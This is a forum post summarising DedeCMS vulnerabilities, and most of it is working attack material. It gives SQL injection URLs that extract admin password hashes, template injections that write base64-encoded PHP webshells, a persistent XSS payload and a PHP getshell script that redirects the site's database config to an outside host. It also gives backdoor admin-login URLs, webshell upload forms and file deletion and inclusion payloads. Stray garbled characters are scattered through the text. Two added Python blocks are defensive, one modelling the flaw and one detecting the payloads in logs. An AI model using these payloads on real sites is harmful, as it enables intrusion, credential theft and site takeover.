DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14

Dedecms 5.6 rss injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload software: in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After posting, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line webshell written directly.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below and visit it. This triggers the XSS and installs the XSS rootkit; note that IE8/9 and similar browsers block URL-type XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser. Whichever of the URLs below you then visit, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (织梦) variable overwrite getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.comwww.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry to the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you are taken straight into the site backend.
The precondition for this vulnerability is that the backend path must first be obtained.
Dedecms (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert this row: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourselves...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
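The mechanism shared by the variable-overwrite getshell script, the backdoor-login URL and the form above (each smuggles a nested GLOBALS[...] array inside a request parameter), as a constructed Python model added here; it is not DedeCMS code and not the post's. The cfg_* names are the post's; parse_form, register_request_vars and the FORBIDDEN prefix check are my own simplification of a register_globals-style loop and of one mitigation for it.

```python
import re
from typing import Any, Dict
from urllib.parse import parse_qsl

# Request keys the hardened variant refuses: anything that would shadow a
# superglobal or a cfg_* setting. The check is my own formulation (assumption),
# not a quotation of DedeCMS source.
FORBIDDEN = re.compile(r"^(cfg_|GLOBALS|_GET|_POST|_COOKIE)")

# Constructed defaults standing in for the site's config.php values.
DEFAULT_CONFIG = {
    "cfg_dbhost": "localhost", "cfg_dbuser": "dede", "cfg_dbpwd": "s3cret",
    "cfg_dbname": "dedecms", "cfg_dbprefix": "dede_",
}


def parse_form(body: str) -> Dict[str, Any]:
    """Build nested dicts from 'a[b][c]=v&x=y', the way PHP fills $_POST/$_GET."""
    out: Dict[str, Any] = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        keys = [name.split("[", 1)[0]] + re.findall(r"\[([^\]]*)\]", name)
        node = out
        for key in keys[:-1]:
            node = node.setdefault(key, {})
        node[keys[-1]] = value
    return out


def register_request_vars(get, post, cookie, hardened=False) -> Dict[str, Any]:
    """Model of a register_globals-style loop: every key of GET, POST and COOKIE
    (walked in that order) becomes a variable. Returns the resulting global scope,
    a dict standing in for PHP's symbol table."""
    scope: Dict[str, Any] = dict(DEFAULT_CONFIG)
    scope.update({"_GET": get, "_POST": post, "_COOKIE": cookie})
    for source in ("_GET", "_POST", "_COOKIE"):
        # The array is read at loop time: a POST field named _COOKIE has already
        # replaced the real cookie array by the time the cookie pass runs.
        items = scope[source]
        if not isinstance(items, dict):
            continue
        for key, value in list(items.items()):
            if hardened and FORBIDDEN.match(key):
                raise ValueError(f"Request var not allowed: {key}")
            if key == "GLOBALS" and isinstance(value, dict):
                scope.update(value)  # a write to $GLOBALS lands in the symbol table
            else:
                scope[key] = value
    return scope


def request_is_rejected(get, post, cookie) -> bool:
    """True when the hardened registration refuses the request outright."""
    try:
        register_request_vars(get, post, cookie, hardened=True)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed body shaped like the mytag_js.php form submission above.
    body = ("doaction=/plus/mytag_js.php?aid=1"
            "&_COOKIE[GLOBALS][cfg_dbhost]=203.0.113.10"
            "&_COOKIE[GLOBALS][cfg_dbuser]=attacker&nocache=true")
    scope = register_request_vars({}, parse_form(body), {"PHPSESSID": "abc"})
    print("cfg_dbhost after unsafe registration:", scope["cfg_dbhost"])
    print("hardened loop rejects the request:", request_is_rejected({}, parse_form(body), {}))
```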
4 k* t$ ~' Q) r$ A- R- T+ O2 XDedecms <= V5.6 Final模板执行漏洞5 o& _+ I5 u6 u! i2 S. r5 {6 n
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
1 B, `! h9 V% muploads/userup/2/12OMX04-15A.jpg  d* y9 j, L3 \
% e9 p/ I) c/ V+ A5 J$ b

$ Z/ M: t) u5 ]6 }8 P1 q模板内容是(如果限制图片格式,加gif89a):
8 q0 L: `. x9 I{dede:name runphp='yes'}7 B+ K/ [# ~2 P) z8 M8 p7 Q. `
$fp = @fopen("1.php", 'a');6 c; C# c: N. C* a' ^: _
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
, a1 e- K; n! k& b' s1 I% J0 S@fclose($fp);
" W) Z9 O7 D) a5 n{/dede:name}
2 Edit the article just posted, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(constructed here)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if it reports that the edit succeeded, we have successfully changed the template path.
3 Visit the edited article:
Assume the aid of the article just edited is 2; then we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save it as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Construct the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Post an article, then construct the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
5 e$ L" V7 l3 F8 X1 k6 z0 F- N2 p% `

& \  \. P6 ^5 Q+ e% O* [: z  a% g8 [  w+ W) d" O

, O. l" J( r, a9 w
$ P1 H& ~* S5 j$ m# z" r* e8 i, P3 F% ~1 S6 ]. N* Y

# R8 a: s: o- \2 X1 k+ o2 @
+ f; _* |0 j9 q$ t
; E0 X: ~. T" Z. q
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5 password; from that, drop 3 from the front and 1 from the back to get the 16-character MD5.
织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
织梦 (Dedecms) select_soft_post.php page uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
织梦 (dedecms) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
This exploits a MySQL numeric field overflow that raises an error, combined with DEDECMS writing database error messages into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message can be seen.
2. Visit
http://www.abc.com/data/mysql_error_trace.php and seeing the following information proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run test.html from dede.rar; note that the address in the form's action is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After pressing OK, seeing the information from step 2 means the trojan file was uploaded successfully.

织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
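A detection pass over web-server access logs for the query-string payloads collected in this post (the rss.php _Cs injection, advancedsearch.php sql=, the gotopage XSS, the _POST[GLOBALS] backdoor login, the edit_face.php deletion, the carbuyaction.php inclusion, the feedback_js.php/infosearch.php union selects and the digg_frame.php PHP-tag injection), as an added Python example that is not part of the post; the rule labels, the LOG_RE format and the sample lines are mine and constructed.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Detection rules for the URL-borne DedeCMS payloads in this post. Each rule is
# (label, script the payload targets or None for any script, pattern matched
# against the URL-decoded query string). Labels are my own.
RULES = [
    ("globals-override", None, re.compile(r"_(COOKIE|POST|GET)\[GLOBALS\]\[cfg_", re.I)),
    ("rss-cs-injection", "/plus/rss.php", re.compile(r"_Cs\[", re.I)),
    ("advancedsearch-sql", "/plus/advancedsearch.php", re.compile(r"(^|&)sql=", re.I)),
    ("gotopage-xss", "/login.php", re.compile(r"gotopage=.*(<script|javascript:|\son\w+=)", re.I)),
    ("edit_face-traversal", "/member/edit_face.php", re.compile(r"dopost=delold.*\.\./")),
    ("carbuyaction-lfi", "/plus/carbuyaction.php", re.compile(r"code=.*\.\./")),
    ("union-select-sqli", None, re.compile(r"union\s+(all\s+)?select\b", re.I)),
    ("digg_frame-php-tag", "/plus/digg_frame.php", re.compile(r"<\?php|\?>|\beval\s*\(", re.I)),
]

# Combined log format: client, ident, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')


def match_request(target: str) -> List[str]:
    """Return the labels of every rule that the request target (path?query) triggers."""
    path, _, query = target.partition("?")
    decoded = unquote_plus(query)  # compare %xx/+ encoded keywords in plain text
    hits = []
    for label, script, pattern in RULES:
        if script is not None and not path.endswith(script):
            continue
        if pattern.search(decoded):
            hits.append(label)
    return hits


def scan_log(lines) -> List[Dict[str, str]]:
    """Run the rules over access-log lines; lines that do not parse are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, when, _method, target, status = m.groups()
        for label in match_request(target):
            findings.append({"client": client, "time": when, "rule": label,
                             "path": target.partition("?")[0], "status": status})
    return findings


# Constructed sample lines (not from any real server), shaped like the post's URLs.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml(1,1,1)%23][0]=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Oct/2012:10:43:02 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx=%22 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Oct/2012:10:44:40 +0800] "GET /dede/login.php?dopost=login&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=198.51.100.7 HTTP/1.1" 302 0 "-" "curl/7.21"',
    '192.0.2.9 - - [18/Oct/2012:10:45:11 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 7321 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} {f['time']} {f['rule']} {f['path']} {f['status']}")
```

The mytag_js.php override travels in the POST body, so it only shows up in logs that record bodies (a WAF or audit log); the login-URL variant of the same override is query-borne and is caught above.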